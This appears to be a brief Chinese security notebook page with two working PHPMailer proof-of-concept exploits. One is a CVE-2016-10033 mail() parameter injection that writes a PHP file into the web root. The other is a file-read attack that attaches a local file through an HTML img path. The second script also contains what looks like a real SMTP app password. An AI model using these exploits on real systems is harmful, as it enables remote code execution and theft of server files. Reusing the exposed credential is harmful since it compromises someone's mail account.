PHPMailer第三方库

命令执行版本 version<5.2.18

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com'; 
$msg_body  = "<?php phpinfo(); ?>"; 
// ------------------ 
// mail() param injection via the vulnerability in PHPMailer 
require_once('class.phpmailer.php'); 
$mail = new PHPMailer(); // defaults to using php "mail()" 
$mail->SetFrom($email_from, 'Client Name'); 
$address = "customer_feedback@company-X.com"; 
$mail->AddAddress($address, "Some User"); 
$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033"; 
$mail->MsgHTML($msg_body); 
if(!$mail->Send()) { 
echo "Mailer Error: " . $mail->ErrorInfo; 
} else { 
echo "Message sent!\n"; 
} 
?>

20.11.21:补充:

其实实际还是挺难用的 终点就是代码中的$this->send变量,需要setForm方法的支持,而我在网站中并没有发现

文件读取 version <=5.2.21

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php 
#Author:Yxlink
 
require_once('PHPMailerAutoload.php');
$mail = new PHPMailer();
$mail->isSMTP();
$mail->Host = 'smtp.qq.com';
$mail->Port = 465;
$mail->SMTPAuth = true;
$mail->Username = 'xxx@qq.com';  //qq邮箱
$mail->Password = 'zsuhxbmsaioxbcgb';//申请配置邮件客户端获取到的16位密码和qq密码不一样
$mail->SMTPSecure = 'ssl';
 
 
$mail->CharSet  = "UTF-8";
$mail->Encoding = "base64";
  
$mail->Subject = "hello";
$mail->From = "xxxx@qq.com"; 
$mail->FromName = "test"; 
  
$address = "xxxx@qq.com";
$mail->AddAddress($address, "test");
  
$mail->AddAttachment('test.txt','test.txt');
$mail->IsHTML(true); 
$msg="<img src='D:\\1.txt'>test";
$mail->msgHTML($msg);
  
if(!$mail->Send()) {
  echo "Mailer Error: " . $mail->ErrorInfo;
} else {
  echo "Message sent!";
}
?>